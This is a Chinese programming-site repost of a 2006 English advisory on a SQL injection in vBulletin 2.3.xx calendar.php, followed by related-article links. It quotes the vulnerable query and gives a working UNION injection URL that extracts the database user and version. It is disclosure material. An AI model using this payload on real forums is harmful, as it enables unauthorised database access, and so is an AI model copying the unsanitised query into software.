编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP无刷新上传文件实现代码

Sep 19 PHP

基于PHP异步执行的常用方式详解

Jun 03 PHP

解析如何修改phpmyadmin中的默认登陆超时时间

Jun 25 PHP

PHP 动态生成静态HTML页面示例代码

Jan 15 PHP

Zend Framework教程之Resource Autoloading用法实例

Mar 08 PHP

Symfony2学习笔记之控制器用法详解

Mar 17 PHP

php字符串操作针对负值的判断分析

Jul 28 PHP

PHP入门教程之会话控制技巧(cookie与session)

Sep 11 PHP

Ajax+PHP实现的分类列表框功能示例

Feb 11 PHP

Laravel 手动开关 Eloquent 修改器的操作方法

Dec 30 PHP

laravel框架使用阿里云短信发送消息操作示例

Feb 15 PHP

详解Laravel服务容器的优势

May 29 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

坏狼的PHP学习教程之第1天

2008/06/15 PHP

一个图片地址分解程序(用于PHP小偷程序)

2014/08/23 PHP

php实现改变图片直接打开为下载的方法

2015/04/14 PHP

PHP关联数组实现根据元素值删除元素的方法

2015/06/26 PHP

10分钟学会写Jquery插件实例教程

2014/09/06 Javascript

JavaScript中变量声明有var和没var的区别示例介绍

2014/09/15 Javascript

jQuery中mouseover事件用法实例

2014/12/26 Javascript

基于js实现微信发送好友如何分享到朋友圈、微博

2015/11/30 Javascript

javascript的列表切换【实现代码】

2016/05/03 Javascript

实例讲解JavaScript的Backbone.js框架中的View视图

2016/05/05 Javascript

基于JS实现密码框(password)中显示文字提示功能代码

2016/05/27 Javascript

Javascript+CSS3实现进度条效果

2016/10/28 Javascript

浅谈移动端之js touch事件手势滑动事件

2016/11/07 Javascript

解决Angular.Js与Django标签冲突的方案

2016/12/20 Javascript

基于JavaScript实现复选框的全选和取消全选

2017/02/09 Javascript

Vue-Router实现页面正在加载特效方法示例

2017/02/12 Javascript

微信小程序实现的贪吃蛇游戏【附源码下载】

2018/01/03 Javascript

vue+element-ui+axios实现图片上传

2019/08/20 Javascript

在vue中使用jsonp进行跨域请求接口操作

2020/10/29 Javascript

[04:55]完美世界副总裁蔡玮：DOTA2的自由、公平与信任

2013/12/18 DOTA

Python升级提示Tkinter模块找不到的解决方法

2014/08/22 Python

Django Docker容器化部署之Django-Docker本地部署

2019/10/09 Python

css3实现超炫风车特效

2014/11/12 HTML / CSS

在html页面中取得session中的值的方法

2020/08/11 HTML / CSS

美国校园市场：OCM

2017/06/08 全球购物

娇韵诗法国官网：Clarins法国

2019/01/29 全球购物

英语专业个人求职自荐信

2013/09/21 职场文书

求职信格式范本

2013/11/15 职场文书

2014学校庆三八妇女节活动总结

2014/03/01 职场文书

学校地质灾害防治方案

2014/06/10 职场文书

工地门卫岗位职责范本

2014/07/01 职场文书

2014大学生批评与自我批评思想汇报

2014/09/21 职场文书

2014年医院工作总结

2014/11/20 职场文书

2015年师德师风自我评价范文

2015/03/05 职场文书

2019年怎样才能撰写出优秀的自荐信

2019/03/25 职场文书

解决pytorch 损失函数中输入输出不匹配的问题

2021/06/05 Python